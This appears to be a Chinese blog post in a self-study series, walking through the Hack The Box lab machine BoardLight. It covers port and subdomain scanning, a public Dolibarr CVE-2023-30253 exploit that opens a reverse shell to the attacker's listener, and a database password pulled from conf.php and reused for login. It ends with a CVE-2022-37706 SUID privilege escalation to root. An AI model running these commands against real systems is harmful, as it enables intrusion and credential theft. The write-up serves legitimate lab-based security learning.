iT邦幫忙

2024 iThome 鐵人賽

DAY 9
0
佛心分享-IT 人自學之術

從0到1的攻擊手自學之旅系列 第 9

[鐵人賽] Day 9:HTB挑戰之旅 Machines (三)- BoardLight

  • 分享至 

  • xImage
  •  

回顧

  • VPN連線進入靶機網域
    • sudo openvpn --config (目標).ovpn

rhost='目標IP'

  • nmap
    • nmap -F (目標IP)
    • 或 nmap -T4 (目標IP)
    • 或 mmap -p- (目標IP) --min-rate 5000
    • nmap -sV -p(目標埠,隔開) (目標IP)
      • 發現23 port: telnet (目標IP)
      • 發現21 port: ftp -v (目標IP)
      • 發現139,445 port: smbclient -L (目標IP)
      • 發現6379 port: redis-cli -h (目標IP)
  • whatweb (目標IP)
  • Linux:$ echo "(目標IP) xxx.htb" | sudo tee -a /etc/hosts
  • ffuf掃瞄子網域名稱
    • ffuf -u http://xxx.htb -H "Host: FUZZ.xxx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
    • SecLists 上次更新4年前的古老字典檔
  • ls, cat flag.txt, get, cd, exit, ip addr, curl, nc, ssh, sudo -l, ln -s, su

BoardLight

這次選的靶機雖然分數很高但是線上只有13人,比起前一台在線人數86應該要流暢一些。
https://ithelp.ithome.com.tw/upload/images/20240918/20165500QWFDdV9lN2.png

Step 1 openvpn

vpn連線

┌──(kali㉿kali)-[~]
└─$ sudo openvpn --config lab_FinleyLi.ovpn

打開BoardLight虛擬機(靶機)

Target IP Address

10.10.11.11

檢查Kali虛擬機(攻擊機)

┌──(kali㉿kali)-[~]
└─$ ip addr

3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 10.10.14.89/23 scope global tun0

目標靶機初始設定,我的個人習慣前面並沒有示範。好處是只要一開始rhost=IP,後面的步驟都可以公式化的複製貼上。

rhost='10.10.11.11'
echo $rhost
ping $rhost -c 4

如果想要把變數rhost清空再執行後面這段unset rhost

Step 2 nmap

┌──(kali㉿kali)-[~]
└─$ nmap -F $rhost
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 10:10 EDT
Nmap scan report for 10.10.11.11
Host is up (0.25s latency).
Not shown: 98 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p22,80 $rhost
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 10:10 EDT
Nmap scan report for 10.10.11.11
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.48 seconds

Step 3 whatweb, nikto

Step 2發現開啟80服務所以判定是網頁,所以就拿whatweb和nikto先做初步的檢測。前兩日的文章有看應該會猜得到,board.htb到手之後前面應該還藏了子網域名稱使用不同的CMS網頁服務,那邊才是真正的破口應該要用nikto去試那一邊才比較有機會。

┌──(kali㉿kali)-[~]
└─$ whatweb $rhost
http://10.10.11.11 [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]

┌──(kali㉿kali)-[~]
└─$ nikto -host $rhost
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.11
+ Target Hostname:    10.10.11.11
+ Target Port:        80
+ Start Time:         2024-09-18 10:14:32 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress
+ Scan terminated: 20 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-09-18 10:28:15 (GMT-4) (823 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

發現board.htb這時要寫到/etc/hosts

echo "$rhost board.htb" | sudo tee -a /etc/hosts

Step 4 ffuf

┌──(kali㉿kali)-[~]
└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

ftp                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 316ms]
ns1                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 319ms]
autodiscover            [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
m                       [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 325ms]
smtp                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 325ms]
whm                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 326ms]
autoconfig              [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 326ms]
mysql                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
dev                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 330ms]
admin                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
ns2                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 331ms]
blog                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 331ms]
test                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 331ms]
www                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 336ms]
pop                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 330ms]
mail                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 331ms]
new                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
ns4                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 327ms]
ns3                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
support                 [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
mx                      [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 347ms]
vpn                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
mobile                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
cpanel                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
www2                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 350ms]
webdisk                 [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 330ms]
cp                      [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
shop                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
old                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 350ms]
mail2                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
pop3                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 324ms]
forum                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
ns                      [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
webmail                 [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
imap                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
localhost               [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
beta                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
demo                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
secure                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 348ms]
dns2                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 349ms]
www3                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 242ms]
staging                 [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 237ms]
search                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 244ms]
stats                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 248ms]
video                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 248ms]
www.test                [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 248ms]
www.forum               [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 248ms]
img                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 313ms]
www1                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 314ms]
mail1                   [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 248ms]
chat                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 254ms]
sql                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 253ms]
ipv4                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 247ms]
images                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 249ms]
intranet                [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 253ms]
www.blog                [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 249ms]
static                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 315ms]
news                    [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 297ms]
api                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 289ms]
portal                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 293ms]
server                  [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 292ms]
web                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 314ms]
mx2                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 254ms]
svn                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 255ms]
wap                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 257ms]
dns                     [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 260ms]
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 262ms]

這裡發現結果錯誤的words=6243,以後要加上-fw 6243參數讓輸出結果比較好看。

┌──(kali㉿kali)-[~]
└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 6243

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 6243
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 270ms]

拿到crm就再來寫入/etc/hosts,其實可以發現上一台靶機permx直接nano /etc/hosts還在,這台我用臨時生效的echo會寫在最下方。

┌──(kali㉿kali)-[~]
└─$ echo "$rhost crm.board.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.11 crm.board.htb

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.11.23     lms.permx.htb
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

10.10.11.11 board.htb
10.10.11.11 crm.board.htb

Step 5 Google

https://ithelp.ithome.com.tw/upload/images/20240918/201655003ChgQx5jhk.png

打開網頁會看到一個Dolibarr 17.0.0的登入頁面,花點時間去google關鍵字可以找到

Step 6 exploit

下載的時候可以試著連線真正的檔案位置
https://raw.githubusercontent.com/

┌──(kali㉿kali)-[~]
└─$ wget https://raw.githubusercontent.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/main/exploit.py

--2024-09-18 20:45:18--  https://raw.githubusercontent.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/main/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16280 (16K) [text/plain]
Saving to: ‘exploit.py’

exploit.py               100%[=================================>]  15.90K  --.-KB/s    in 0.01s

2024-09-18 20:45:18 (1.42 MB/s) - ‘exploit.py’ saved [16280/16280]

打開NC等待

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

執行exploit

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py http://crm.board.htb admin password 10.10.14.89 4444
/usr/local/lib/python3.11/dist-packages/requests-2.20.0-py3.11.egg/requests/__init__.py:89: RequestsDependencyWarning: urllib3 (2.0.7) or chardet (5.2.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
[*] Trying authentication...
[**] Login: admin
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

nc取得返回

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.89] from (UNKNOWN) [10.10.11.11] 40918
bash: cannot set terminal process group (890): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

前面操作過一次,網頁的CMS先找config類型的檔案看有沒有訊息可以利用,這裡取得很像密碼的東西。

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ find /var -name "conf.php" 2>/dev/null
<lic/website$ find /var -name "conf.php" 2>/dev/null
/var/www/html/crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep db_pass
<l/crm.board.htb/htdocs/conf/conf.php | grep db_pass
$dolibarr_main_db_pass='serverfun2$2023!!';

ls /home找到使用者名稱。

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ ls /home
ls /home
larissa

從網頁程式www-data權限切換成為一般使用者權限

www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ su larissa
su larissa
Password: serverfun2$2023!!
cd /home/larissa
ls
a.out
check.sh
Desktop
Documents
Downloads
exploit.c
exploit.sh
Music
Pictures
Public
Templates
user.txt
Videos

剛才的畫面不是很適合人類閱讀,我們用ssh再來看一次user.txt。

┌──(kali㉿kali)-[~]
└─$ ssh larissa@10.10.11.11
The authenticity of host '10.10.11.11 (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.
larissa@10.10.11.11's password:
Last login: Wed Sep 18 17:38:23 2024 from 10.10.14.45
larissa@boardlight:~$ ls
a.out     Desktop    Downloads  exploit.sh  Pictures  Templates  Videos
check.sh  Documents  exploit.c  Music       Public    user.txt
larissa@boardlight:~$ cat user.txt
d01d2c7b87ede2696002bc04a3500e74

登入的時候我們發現一個關鍵字,真的很不明顯一下就忽略,依照這個線索往下探尋。
Warning: Permanently added '10.10.11.11' (ED25519) to the list of known hosts.

確認一下是不是真的有perm套件。

larissa@boardlight:~$ find / -perm /u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

執行exploit,而且系統很好心的2022-37706就在裡面

larissa@boardlight:~$ ls
a.out     Desktop    Downloads  exploit.sh  Pictures  Templates  Videos
check.sh  Documents  exploit.c  Music       Public    user.txt
larissa@boardlight:~$ cat user.txt
d01d2c7b87ede2696002bc04a3500e74
larissa@boardlight:~$ cat exploit.sh
#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

這裡要先變更exploit.sh為可執行,然後用執行它,

larissa@boardlight:~$ chmod +x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# pwd
/home/larissa
# find / -type f -name "root.txt" 2> /dev/null
/root/root.txt
# cat /root/root.txt
07b8f5c76101dcfdfbcfaed113429109

SOP Update

  • VPN連線進入靶機網域

    • sudo openvpn --config (目標).ovpn
  • rhost='目標IP'

  • nmap

    • nmap -F $rhost
    • 或 nmap -T4 $rhost
    • 或 nmap -p- $rhost --min-rate 5000
    • nmap -sC -sV -p(多個目標埠,隔開) $rhost
      • 發現23 port: telnet $rhost
      • 發現21 port: ftp -v $rhost
      • 發現139,445 port: smbclient -L $rhost
      • 發現6379 port: redis-cli -h $rhost
  • whatweb $rhost

  • nikto $rhost

  • Linux:$ echo "$rhost xxx.htb" | sudo tee -a /etc/hosts

  • ffuf掃瞄子網域名稱

    • ffuf -u http://xxx.htb -H "Host: FUZZ.xxx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 6243
    • SecLists 上次更新4年前的古老字典檔
  • ls, cat, get, cd, exit, ip addr, curl, nc, ssh, nano, sudo -l, echo, ln -s, su, wget, | grep, whoami&&id

這一波9天下來鍵盤上打過的linux指令越來越豐富,我自己是覺得Day 9改成變數$rhost比較方便,寫成SOP看起來更清楚。更重要的是,這台靶機人比較少沒有像Day 7,8那一台一直被清掉exploit程式真的很受不了,如果不是寫鐵人賽我或果斷的換一台不會在那邊花三十間搞它,我覺得懂得停損也是很重要的觀念。😂


上一篇
[鐵人賽] Day 8:HTB挑戰之旅 Machines (二)- PermX _ Part 2
下一篇
[鐵人賽] Day 10:回顧3/18課程 - 攻防演練分享研討會
系列文
從0到1的攻擊手自學之旅30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言